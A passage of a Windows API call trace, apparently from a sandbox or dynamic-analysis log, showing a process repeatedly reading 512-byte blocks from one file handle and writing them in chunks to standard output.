(_FileHandle=1) returned 0x4c [0131.950] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceeb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceeb8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] GetFileType (hFile=0x4c) returned 0x1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef08*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] GetFileType (hFile=0x4c) returned 0x1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef58*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] GetFileType (hFile=0x4c) returned 0x1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cefa8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.950] GetFileType (hFile=0x4c) returned 0x1 [0131.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.951] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceff8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.951] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.951] GetFileType (hFile=0x4c) returned 0x1 [0131.951] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.951] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf048*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cf048*, lpNumberOfBytesWritten=0x1ce04c*=0x20, lpOverlapped=0x0) returned 1 [0131.951] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.951] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.951] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.951] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x200, lpOverlapped=0x0) returned 1 [0131.951] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.951] GetFileType (hFile=0x4c) returned 0x1 [0131.951] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.951] GetFileType (hFile=0x4c) returned 0x1 [0131.951] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.951] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.951] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.951] GetFileType (hFile=0x4c) returned 0x1 [0131.951] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.951] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceeb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceeb8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.951] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.951] GetFileType (hFile=0x4c) returned 0x1 [0131.951] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.951] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef08*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.951] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.951] GetFileType (hFile=0x4c) returned 0x1 [0131.952] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.952] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef58*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.952] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.952] GetFileType (hFile=0x4c) returned 0x1 [0131.952] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.952] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cefa8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.952] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.952] GetFileType (hFile=0x4c) returned 0x1 [0131.952] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.952] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceff8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.952] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.952] GetFileType (hFile=0x4c) returned 0x1 [0131.952] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.952] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf048*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cf048*, lpNumberOfBytesWritten=0x1ce04c*=0x20, lpOverlapped=0x0) returned 1 [0131.952] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.952] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.952] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.952] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x200, lpOverlapped=0x0) returned 1 [0131.952] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.952] GetFileType (hFile=0x4c) returned 0x1 [0131.952] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.952] GetFileType (hFile=0x4c) returned 0x1 [0131.952] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.952] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] GetFileType (hFile=0x4c) returned 0x1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceeb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceeb8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] GetFileType (hFile=0x4c) returned 0x1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef08*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] GetFileType (hFile=0x4c) returned 0x1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef58*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] GetFileType (hFile=0x4c) returned 0x1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cefa8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] GetFileType (hFile=0x4c) returned 0x1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceff8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] GetFileType (hFile=0x4c) returned 0x1 [0131.953] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.953] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf048*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cf048*, lpNumberOfBytesWritten=0x1ce04c*=0x20, lpOverlapped=0x0) returned 1 [0131.953] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.953] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.953] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.953] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x200, lpOverlapped=0x0) returned 1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] GetFileType (hFile=0x4c) returned 0x1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] GetFileType (hFile=0x4c) returned 0x1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] GetFileType (hFile=0x4c) returned 0x1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceeb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceeb8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] GetFileType (hFile=0x4c) returned 0x1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef08*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] GetFileType (hFile=0x4c) returned 0x1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef58*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] GetFileType (hFile=0x4c) returned 0x1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cefa8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] GetFileType (hFile=0x4c) returned 0x1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceff8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] GetFileType (hFile=0x4c) returned 0x1 [0131.954] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.954] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf048*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cf048*, lpNumberOfBytesWritten=0x1ce04c*=0x20, lpOverlapped=0x0) returned 1 [0131.954] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.954] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.955] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.955] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x200, lpOverlapped=0x0) returned 1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] GetFileType (hFile=0x4c) returned 0x1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] GetFileType (hFile=0x4c) returned 0x1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] GetFileType (hFile=0x4c) returned 0x1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceeb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceeb8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] GetFileType (hFile=0x4c) returned 0x1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef08*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] GetFileType (hFile=0x4c) returned 0x1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef58*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] GetFileType (hFile=0x4c) returned 0x1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cefa8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] GetFileType (hFile=0x4c) returned 0x1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceff8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] GetFileType (hFile=0x4c) returned 0x1 [0131.955] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.955] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf048*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cf048*, lpNumberOfBytesWritten=0x1ce04c*=0x20, lpOverlapped=0x0) returned 1 [0131.955] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.956] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.956] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.956] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x200, lpOverlapped=0x0) returned 1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] GetFileType (hFile=0x4c) returned 0x1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] GetFileType (hFile=0x4c) returned 0x1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] GetFileType (hFile=0x4c) returned 0x1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceeb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceeb8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] GetFileType (hFile=0x4c) returned 0x1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef08*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] GetFileType (hFile=0x4c) returned 0x1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef58*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] GetFileType (hFile=0x4c) returned 0x1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cefa8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] GetFileType (hFile=0x4c) returned 0x1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceff8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] GetFileType (hFile=0x4c) returned 0x1 [0131.956] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.956] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf048*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cf048*, lpNumberOfBytesWritten=0x1ce04c*=0x20, lpOverlapped=0x0) returned 1 [0131.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.957] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.957] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x200, lpOverlapped=0x0) returned 1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] GetFileType (hFile=0x4c) returned 0x1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] GetFileType (hFile=0x4c) returned 0x1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] GetFileType (hFile=0x4c) returned 0x1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceeb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceeb8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] GetFileType (hFile=0x4c) returned 0x1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef08*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] GetFileType (hFile=0x4c) returned 0x1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef58*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] GetFileType (hFile=0x4c) returned 0x1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cefa8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.957] GetFileType (hFile=0x4c) returned 0x1 [0131.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceff8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] GetFileType (hFile=0x4c) returned 0x1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf048*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cf048*, lpNumberOfBytesWritten=0x1ce04c*=0x20, lpOverlapped=0x0) returned 1 [0131.958] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.958] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.958] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.958] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x200, lpOverlapped=0x0) returned 1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] GetFileType (hFile=0x4c) returned 0x1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] GetFileType (hFile=0x4c) returned 0x1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] GetFileType (hFile=0x4c) returned 0x1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceeb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceeb8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] GetFileType (hFile=0x4c) returned 0x1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef08*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] GetFileType (hFile=0x4c) returned 0x1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, 